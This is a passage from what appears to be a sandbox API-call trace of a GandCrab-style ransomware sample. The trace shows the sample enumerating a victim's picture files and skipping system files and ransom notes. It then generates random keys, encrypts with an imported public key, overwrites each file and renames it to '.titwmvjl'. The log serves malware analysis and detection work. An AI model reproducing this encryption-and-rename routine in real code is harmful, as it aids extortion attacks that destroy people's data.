[0094.288] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\d2ca4a09d2ca4deb61a.lock") returned 102 [0094.288] VirtualAlloc (lpAddress=0x0, dwSize=0x10c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.288] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 111 [0094.288] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\d2ca4a09d2ca4deb61a.lock") returned 102 [0094.288] lstrlenW (lpString=".lock") returned 5 [0094.288] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.288] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.288] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.288] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.289] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.289] lstrcmpW (lpString1="lPkOLyg3SygPqM.jpg", lpString2=".") returned 1 [0094.289] lstrcmpW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="..") returned 1 [0094.289] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\", lpString2="lPkOLyg3SygPqM.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg" [0094.289] lstrlenW (lpString=".titwmvjl") returned 9 [0094.289] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg") returned 96 [0094.289] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.289] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg.titwmvjl") returned 105 [0094.289] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg") returned 96 [0094.289] lstrlenW (lpString=".jpg") returned 4 [0094.289] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.289] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0094.289] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0094.289] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.290] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg") returned 96 [0094.290] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg") returned 96 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="desktop.ini") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="autorun.inf") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="ntuser.dat") returned -1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="iconcache.db") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="bootsect.bak") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="boot.ini") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="ntuser.dat.log") returned -1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="thumbs.db") returned -1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="CRAB-DECRYPT.html") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="ntldr") returned -1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="NTDETECT.COM") returned -1 [0094.290] lstrcmpiW (lpString1="lPkOLyg3SygPqM.jpg", lpString2="Bootfont.bin") returned 1 [0094.290] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg") returned 96 [0094.290] lstrlenW (lpString=".jpg") returned 4 [0094.290] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.290] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0094.290] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.290] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.291] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\9jlzubtiz6\\lpkolyg3sygpqm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0094.291] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.291] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0094.292] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.292] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.292] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.293] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.293] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.294] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.294] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0094.294] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.294] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.294] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.294] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.294] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.295] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.295] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.295] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.295] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0094.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.296] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.296] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.296] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.296] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.296] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.297] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5037f8) returned 1 [0094.297] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.297] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.297] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.297] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.297] GetLastError () returned 0x0 [0094.297] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.298] CryptDestroyKey (hKey=0x5037f8) returned 1 [0094.298] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.298] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.298] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.298] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.299] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5035b8) returned 1 [0094.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.299] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.299] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.300] GetLastError () returned 0x0 [0094.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.300] CryptDestroyKey (hKey=0x5035b8) returned 1 [0094.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.300] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.300] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.300] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.301] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0xc2f6, lpOverlapped=0x0) returned 1 [0094.313] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffff3d0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.313] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc2f6, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0xc2f6, lpOverlapped=0x0) returned 1 [0094.314] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.314] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0094.315] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.319] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.320] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.320] CloseHandle (hObject=0x2d4) returned 1 [0094.321] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\9jlzubtiz6\\lpkolyg3sygpqm.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\lPkOLyg3SygPqM.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\9jlzubtiz6\\lpkolyg3sygpqm.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0094.321] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.322] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.322] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.322] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.322] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\TITWMVJL-DECRYPT.txt" [0094.322] lstrlenW (lpString=".titwmvjl") returned 9 [0094.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\TITWMVJL-DECRYPT.txt") returned 98 [0094.322] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.322] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 107 [0094.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\TITWMVJL-DECRYPT.txt") returned 98 [0094.322] lstrlenW (lpString=".txt") returned 4 [0094.322] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.322] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.322] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.323] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\TITWMVJL-DECRYPT.txt") returned 98 [0094.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\TITWMVJL-DECRYPT.txt") returned 98 [0094.323] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.323] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.323] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.323] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.323] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.323] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.323] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.323] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.323] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.323] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.323] lstrcmpW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2=".") returned 1 [0094.323] lstrcmpW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="..") returned 1 [0094.323] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\", lpString2="zmN-bRUBdO1_f9B32.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png" [0094.323] lstrlenW (lpString=".titwmvjl") returned 9 [0094.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png") returned 99 [0094.323] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.324] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png.titwmvjl") returned 108 [0094.324] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png") returned 99 [0094.324] lstrlenW (lpString=".png") returned 4 [0094.324] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.324] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0094.324] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0094.324] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png") returned 99 [0094.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png") returned 99 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="desktop.ini") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="autorun.inf") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="ntuser.dat") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="iconcache.db") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="bootsect.bak") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="boot.ini") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="ntuser.dat.log") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="thumbs.db") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="KRAB-DECRYPT.html") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="CRAB-DECRYPT.html") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="ntldr") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="NTDETECT.COM") returned 1 [0094.325] lstrcmpiW (lpString1="zmN-bRUBdO1_f9B32.png", lpString2="Bootfont.bin") returned 1 [0094.325] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png") returned 99 [0094.325] lstrlenW (lpString=".png") returned 4 [0094.325] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.325] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0094.326] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.326] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.326] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\zmN-bRUBdO1_f9B32.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\9jlzubtiz6\\zmn-brubdo1_f9b32.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0094.327] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.327] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0094.327] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.328] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.328] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.328] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.329] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.329] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0094.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.329] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.329] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.329] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.330] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.330] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.330] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.330] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0094.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.330] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.330] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.331] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.331] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0094.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.332] 